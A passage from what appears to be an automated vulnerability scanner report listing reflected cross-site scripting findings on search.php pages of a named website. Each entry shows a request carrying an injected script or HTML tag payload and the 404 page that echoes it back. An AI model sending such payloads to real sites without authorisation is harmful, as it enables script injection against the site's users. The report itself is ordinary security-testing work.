This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/themes/kosmos/images/rating/search.php?keyword=search...a2b5b<a>fcea11e52d1&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/rating/search.php?keyword=search...a2b5b<a>fcea11e52d1&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3789. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f966f<script>alert(1)</script>8a8c0dec2d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&f966f<script>alert(1)</script>8a8c0dec2d3=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&f966f<script>alert(1)</script>8a8c0dec2d3=1 was not found on this server.</p>
...[SNIP]...

2.3790. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload cadb5<a>c5642c409c6 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2cadb5<a>c5642c409c6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2cadb5<a>c5642c409c6 was not found on this server.</p>
...[SNIP]...

2.3791. http://www.resellerbase.com/detail/9/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8ef1f<script>alert(1)</script>dfa22306590 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail8ef1f<script>alert(1)</script>dfa22306590/9/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8ef1f<script>alert(1)</script>dfa22306590/9/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3792. http://www.resellerbase.com/detail/9/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 79249<script>alert(1)</script>68c72488d8d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/979249<script>alert(1)</script>68c72488d8d/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/979249<script>alert(1)</script>68c72488d8d/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3793. http://www.resellerbase.com/detail/9/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 22a2f<script>alert(1)</script>9484d733135 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes22a2f<script>alert(1)</script>9484d733135/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes22a2f<script>alert(1)</script>9484d733135/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3794. http://www.resellerbase.com/detail/9/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3ec29<script>alert(1)</script>42703acc04a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos3ec29<script>alert(1)</script>42703acc04a/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos3ec29<script>alert(1)</script>42703acc04a/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3795. http://www.resellerbase.com/detail/9/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1f36f<script>alert(1)</script>ba928904c62 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images1f36f<script>alert(1)</script>ba928904c62/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images1f36f<script>alert(1)</script>ba928904c62/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3796. http://www.resellerbase.com/detail/9/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 92720<script>alert(1)</script>70c3f479b7c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images/search.php92720<script>alert(1)</script>70c3f479b7c?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/search.php92720<script>alert(1)</script>70c3f479b7c?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3797. http://www.resellerbase.com/detail/9/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 509bc<a>80a5dd6fdf3 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/themes/kosmos/images/search.php?keyword=search...&Submit3=Search509bc<a>80a5dd6fdf3&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/search.php?keyword=search...&Submit3=Search509bc<a>80a5dd6fdf3&opt=2 was not found on this server.</p>
...[SNIP]...

2.3798. http://www.resellerbase.com/detail/9/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 83abc<a>ef0d2e8c4b1 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/themes/kosmos/images/search.php?keyword=search...83abc<a>ef0d2e8c4b1&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/search.php?keyword=search...83abc<a>ef0d2e8c4b1&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3799. http://www.resellerbase.com/detail/9/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 357ea<script>alert(1)</script>df0fba776b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&357ea<script>alert(1)</script>df0fba776b2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&357ea<script>alert(1)</script>df0fba776b2=1 was not found on this server.</p>
...[SNIP]...

2.3800. http://www.resellerbase.com/detail/9/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 82cec<a>f4c2e381a61 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=282cec<a>f4c2e381a61 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=282cec<a>f4c2e381a61 was not found on this server.</p>
...[SNIP]...

2.3801. http://www.resellerbase.com/detail/9/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6252d<script>alert(1)</script>fb3b8e4327b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail6252d<script>alert(1)</script>fb3b8e4327b/9/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail6252d<script>alert(1)</script>fb3b8e4327b/9/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3802. http://www.resellerbase.com/detail/9/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f864c<script>alert(1)</script>733785b811b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9f864c<script>alert(1)</script>733785b811b/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9f864c<script>alert(1)</script>733785b811b/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3803. http://www.resellerbase.com/detail/9/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8b1e0<script>alert(1)</script>1e41ace7abf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes8b1e0<script>alert(1)</script>1e41ace7abf/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes8b1e0<script>alert(1)</script>1e41ace7abf/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3804. http://www.resellerbase.com/detail/9/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 42be4<script>alert(1)</script>d5c488018c5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos42be4<script>alert(1)</script>d5c488018c5/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos42be4<script>alert(1)</script>d5c488018c5/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3805. http://www.resellerbase.com/detail/9/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 92a75<script>alert(1)</script>31b69396296 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/search.php92a75<script>alert(1)</script>31b69396296?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
